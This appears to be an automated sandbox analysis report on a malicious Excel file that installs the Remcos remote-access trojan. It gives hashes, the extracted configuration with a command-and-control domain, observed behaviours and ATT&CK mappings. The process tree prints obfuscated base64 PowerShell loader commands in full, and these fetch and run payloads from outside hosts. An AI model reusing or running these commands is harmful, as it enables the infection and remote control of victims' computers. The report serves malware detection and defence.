remcos | 9eb3ac05340da70c56dc36e8beece9a7c052c945fc3ceade2c622c4defec54b3

Analysis

max time kernel
148s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21-01-2025 03:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9eb3ac05340da70c56dc36e8beece9a7c052c945fc3ceade2c622c4defec54b3.xls
Size

1.3MB
MD5

777464f57cb83a39b7324d1f7505b6d6
SHA1

25acb95ef77574c20002165e6b68526d7318acd1
SHA256

9eb3ac05340da70c56dc36e8beece9a7c052c945fc3ceade2c622c4defec54b3
SHA512

6609bfa04a5ae724eabd2f13c992a255554ae910ce6bcd6d25a62d8e2652d8aa129eae0908e266e3dfa808c19708a0a45c9b2922c531e03b1c2142847dbab8e3
SSDEEP

24576:pVH9M2HUO8Yfb3B/RvUp9EKDE/XY6lRvmfOdkGRjXv4cGysQYcb06hp8IJh1:LdMj/cb3I6Kg/ooofOdkGRXQcGTlczD

Score

10^/10

remcos zynova defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

zynova

millionairedreams2025.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-MGAETQ
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 5 IoCs

flow	pid	Process
24	320	mshta.exe
25	320	mshta.exe
27	2396	powershell.exe
29	1560	powershell.exe
30	1560	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2396	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1560	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1560 set thread context of 2324	1560	powershell.exe	41

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 2 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2708	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2396	powershell.exe
2396	powershell.exe
2396	powershell.exe
1560	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2396	powershell.exe
Token: SeDebugPrivilege	1560	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2708	EXCEL.EXE
2708	EXCEL.EXE
2708	EXCEL.EXE
2708	EXCEL.EXE
2708	EXCEL.EXE

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 320 wrote to memory of 2528	320	mshta.exe	32
PID 320 wrote to memory of 2528	320	mshta.exe	32
PID 320 wrote to memory of 2528	320	mshta.exe	32
PID 320 wrote to memory of 2528	320	mshta.exe	32
PID 2528 wrote to memory of 2396	2528	cmd.exe	34
PID 2528 wrote to memory of 2396	2528	cmd.exe	34
PID 2528 wrote to memory of 2396	2528	cmd.exe	34
PID 2528 wrote to memory of 2396	2528	cmd.exe	34
PID 2396 wrote to memory of 2028	2396	powershell.exe	35
PID 2396 wrote to memory of 2028	2396	powershell.exe	35
PID 2396 wrote to memory of 2028	2396	powershell.exe	35
PID 2396 wrote to memory of 2028	2396	powershell.exe	35
PID 2028 wrote to memory of 764	2028	csc.exe	36
PID 2028 wrote to memory of 764	2028	csc.exe	36
PID 2028 wrote to memory of 764	2028	csc.exe	36
PID 2028 wrote to memory of 764	2028	csc.exe	36
PID 2396 wrote to memory of 2356	2396	powershell.exe	38
PID 2396 wrote to memory of 2356	2396	powershell.exe	38
PID 2396 wrote to memory of 2356	2396	powershell.exe	38
PID 2396 wrote to memory of 2356	2396	powershell.exe	38
PID 2356 wrote to memory of 1560	2356	WScript.exe	39
PID 2356 wrote to memory of 1560	2356	WScript.exe	39
PID 2356 wrote to memory of 1560	2356	WScript.exe	39
PID 2356 wrote to memory of 1560	2356	WScript.exe	39
PID 1560 wrote to memory of 2324	1560	powershell.exe	41
PID 1560 wrote to memory of 2324	1560	powershell.exe	41
PID 1560 wrote to memory of 2324	1560	powershell.exe	41
PID 1560 wrote to memory of 2324	1560	powershell.exe	41
PID 1560 wrote to memory of 2324	1560	powershell.exe	41
PID 1560 wrote to memory of 2324	1560	powershell.exe	41
PID 1560 wrote to memory of 2324	1560	powershell.exe	41
PID 1560 wrote to memory of 2324	1560	powershell.exe	41
PID 1560 wrote to memory of 2324	1560	powershell.exe	41
PID 1560 wrote to memory of 2324	1560	powershell.exe	41
PID 1560 wrote to memory of 2324	1560	powershell.exe	41

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\9eb3ac05340da70c56dc36e8beece9a7c052c945fc3ceade2c622c4defec54b3.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2708

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:320
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2528
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2396
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-m8bxw8b.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2028
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDDA3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDDA2.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:764
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2356
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA4ADgAMwAvADQAMgAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAzADcAMQAyADQAOQA4ADAAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAeQByAGUAdgBlAHIAbwBmAGwAawB1AGYAaQB0AHUAYQBlAGIAeQByAGUAdgBlAHIAYQBzAGwAcgBpAGcAdABoAGcAaQBuAC8AYgBrAGsALwBwAHAAbQBhAHgALwA3AC4ANQAxADIALgAwADEAMgAuADIAOQAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1560
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2324

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

Filesize
1KB

MD5
638d25e0a7f69e83613ca8e7a22dd53f

SHA1
f6ebf6481c8bf938215f67efd9568a1a9a491b86

SHA256
2ca38e79850059b8267b6746961bbe25a860cea7775c51a82c6d0fda40ff46bf

SHA512
242daade12feb7ee2b38bf494ad5562ffcef73002b92fa03f4f9f6e8e0b0f9ef548783d8306c7ee96ed02c595cc3652458bd3ed647b43c9ce6f72501b6b4737b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
2KB

MD5
f6510bc086c606604d7d836e359ef870

SHA1
621a87bf659eee6e933b93ead628ad349332cadc

SHA256
625e1ee5f0b5d295b9a0794aebe8d2321ec6276ff00f82783a39d4815c16e7f7

SHA512
710e01d68fb60e6d105eb91068d2d6561692be592198eab6a2ef83e4f5e40028699635fe2ee696713f289eedf43ec3565eb73840b38a0b9a5bb36458b4078528

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BCB67D7ECB470284AF35679F339E879F

Filesize
713B

MD5
4dd3b7516e0506a5ce9bbd7e7852ad63

SHA1
03ee3f10ec015b1706f45e784575223e4c70ad35

SHA256
1e2158a765a3b4e776cc0aa670f0c3b8aa078bd9477662dd310e986014bb4410

SHA512
6890ae7bba98f40324acc3ecb25da4fe74ae796e911bfb1e8c06ccea87b990bd8049ee779d3e86d2e5c0a08633988380c474e4c383fbb1a3ca500629871aa22c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F53EB4E574DE32C870452087D92DBEBB_1D05198E4FEA086037F021F18838C63E

Filesize
471B

MD5
c19130a2b97977edfde40b55dad359b9

SHA1
de181ba14fad2ed70bd2481ee6d5374c0e2bb169

SHA256
1c8c359dd897c490f397ae29c54c8549ff46003d5473831115ed447845dc6f00

SHA512
75742e07c233958b53b86fff64b433ccccf363e06c2e1b663f207d6005d632f1bf3475915f063ae1631de6150f9f01d7fbffacdcc55c8e2d6191f00d5ff634fc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

Filesize
434B

MD5
ec2a771f7689a70097258361b942663a

SHA1
1f38577751fb373b177787c2fd02b7bc651ea6a5

SHA256
f9b718670ccc0e14e65396ad2d3357939af7eda6bebf6520e7103ed6c27c9816

SHA512
5e67b8e567dd1683a834779ff7b113d57fc7d877b888d9943636f3944de31d1f3bb28b9388e0e37589ad92622f9ea03df806ad6e51cf28245beb8dd87665ac6e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c6ccfe150bcd65d5203b126c4c505d43

SHA1
4dab36da4339b4adaa1df1973b77e2ad5259a596

SHA256
ee00dc36ac040a6f052153eaf472a5c875e8bbcc5d06e5e97bd301574219a5c3

SHA512
0a3e599c1fcce715a552411c5cf665d745f84ed5f1cf7296f3a066ad8e169ed99f6cf3aac38b2320673cf413c1acabc0417892ab4d5a71f97074a4f317589b9b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
458B

MD5
8bcfd8ff12bdee6f7b9629f19288d225

SHA1
93fb822770734037ea7ba38c7ad645be2bdaf02e

SHA256
441ba2f6e640c89bd81c1e83b8eb6c4d81e5c977fd6511f9cadee776aeae2730

SHA512
562a7dc5a397eb6c52f1ed62c7b7f14b1af8b234e27e256b98e82b48293a1983e9d34c567a8b888422467928b03ce7449c05c70e4893cefa266b8e95ef3ab159

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BCB67D7ECB470284AF35679F339E879F

Filesize
276B

MD5
0272b09205e943f0ef1c59c4dae7b707

SHA1
a488e412a47c0b992daf8cc7f240add43a366f8e

SHA256
e82c10b36be9ddfbae1b6c2d744c1dc54f6f06a8d3d1a800259d1b4ff0f07fbc

SHA512
13b1b2cc45804916664b2645908b8df64e2c28696c84480dd781048205006103cb67443a9fb9f9f3b1535967bf1f18907cda0cd87f52307f18b785b046f4e7a5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F53EB4E574DE32C870452087D92DBEBB_1D05198E4FEA086037F021F18838C63E

Filesize
426B

MD5
194b69b7ed6979cb8a93b89f75818658

SHA1
a9b33a553932cedced8df435b9e950664a86bab2

SHA256
a9e2012416b7a232733f0d097f599aa807efbaef868e035f990e0e39712b4cda

SHA512
c831ee343408b1b7174fc9c96d2c53a9c7980b1b1515820ea14da81a4f81c526a8b77f80a6afe9a4b5e8947bd5599adaabf11a9f98979a9f24e28538761e9827

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\nicegirlkissedmewithloverissingmegoodgreatthings[1].hta

Filesize
12KB

MD5
b01bb72dc50b59e0c45e0d82ccc85652

SHA1
